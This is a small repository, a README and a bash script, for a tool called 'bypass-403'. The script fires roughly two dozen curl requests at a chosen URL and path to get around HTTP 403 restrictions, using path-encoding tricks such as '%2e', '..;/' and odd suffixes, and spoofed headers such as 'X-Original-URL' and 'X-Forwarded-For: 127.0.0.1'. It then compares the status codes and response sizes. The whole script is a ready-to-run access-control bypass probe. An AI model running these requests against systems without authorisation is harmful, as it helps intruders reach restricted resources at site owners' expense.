├── README.md
├── bypass-403.sh
└── responses.jpg


/README.md:
--------------------------------------------------------------------------------
 1 | # Bypass-403
 2 | - A simple script just made for self use for bypassing 403
 3 | - It can also be used to compare responses on verious conditions as shown in the below snap
 4 | ![](responses.jpg)
 5 | 
 6 | # Usage
 7 | `./bypass-403.sh https://example.com admin`
 8 | 
 9 | `./bypass-403.sh website-here path-here`
10 | 
11 | # Features
12 | - Use 24 known Bypasses for 403 with the help of curl
13 | 
14 | # Installation
15 |    * `git clone https://github.com/iamj0ker/bypass-403`
16 |    * `cd bypass-403`
17 |    * `chmod +x bypass-403.sh`
18 |    * `sudo apt install figlet`  - If you are unable to see the logo as in the screenshot
19 |    * `sudo apt install jq`      - If you don't have jq installed on your machine
20 |    
21 | # Contributers
22 |   [remonsec](https://github.com/remonsec),
23 |   [manpreet](https://github.com/manpreet406)
24 |   [MayankPandey01](https://github.com/MayankPandey01)
25 |   [saadibabar](https://github.com/saadibabar)
26 | 


--------------------------------------------------------------------------------
/bypass-403.sh:
--------------------------------------------------------------------------------
 1 | #! /bin/bash
 2 | figlet Bypass-403
 3 | echo "                                               By Iam_J0ker"
 4 | echo "./bypass-403.sh https://example.com path"
 5 | echo " "
 6 | curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2
 7 | echo "  --> ${1}/${2}"
 8 | curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/%2e/$2
 9 | echo "  --> ${1}/%2e/${2}"
10 | curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2/.
11 | echo "  --> ${1}/${2}/."
12 | curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1//$2//
13 | echo "  --> ${1}//${2}//"
14 | curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/./$2/./
15 | echo "  --> ${1}/./${2}/./"
16 | curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Original-URL: $2" $1/$2
17 | echo "  --> ${1}/${2} -H X-Original-URL: ${2}"
18 | curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Custom-IP-Authorization: 127.0.0.1" $1/$2
19 | echo "  --> ${1}/${2} -H X-Custom-IP-Authorization: 127.0.0.1"
20 | curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-For: http://127.0.0.1" $1/$2
21 | echo "  --> ${1}/${2} -H X-Forwarded-For: http://127.0.0.1"
22 | curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-For: 127.0.0.1:80" $1/$2
23 | echo "  --> ${1}/${2} -H X-Forwarded-For: 127.0.0.1:80"
24 | curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-rewrite-url: $2" $1
25 | echo "  --> ${1} -H X-rewrite-url: ${2}"
26 | curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2%20
27 | echo "  --> ${1}/${2}%20"
28 | curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2%09
29 | echo "  --> ${1}/${2}%09"
30 | curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2?
31 | echo "  --> ${1}/${2}?"
32 | curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2.html
33 | echo "  --> ${1}/${2}.html"
34 | curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2/?anything
35 | echo "  --> ${1}/${2}/?anything"
36 | curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2#
37 | echo "  --> ${1}/${2}#"
38 | curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "Content-Length:0" -X POST $1/$2
39 | echo "  --> ${1}/${2} -H Content-Length:0 -X POST"
40 | curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2/*
41 | echo "  --> ${1}/${2}/*"
42 | curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2.php
43 | echo "  --> ${1}/${2}.php"
44 | curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2.json
45 | echo "  --> ${1}/${2}.json"
46 | curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -X TRACE $1/$2
47 | echo "  --> ${1}/${2}  -X TRACE"
48 | curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Host: 127.0.0.1" $1/$2
49 | echo "  --> ${1}/${2} -H X-Host: 127.0.0.1"
50 | curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$1/$2..;/"
51 | echo "  --> ${1}/${2}..;/"
52 | curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" " $1/$2;/"
53 | echo "  --> ${1}/${2};/"
54 | #updated
55 | curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -X TRACE $1/$2
56 | echo "  --> ${1}/${2} -X TRACE"
57 | curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-Host: 127.0.0.1" $1/$2
58 | echo "  --> ${1}/${2} -H X-Forwarded-Host: 127.0.0.1"
59 | echo "Way back machine:"
60 | curl -s  https://archive.org/wayback/available?url=$1/$2 | jq -r '.archived_snapshots.closest | {available, url}'
61 | 
62 | 


--------------------------------------------------------------------------------
/responses.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/iamj0ker/bypass-403/94ed64f9ae75f3313a29822025f9b62c9a73ad97/responses.jpg


--------------------------------------------------------------------------------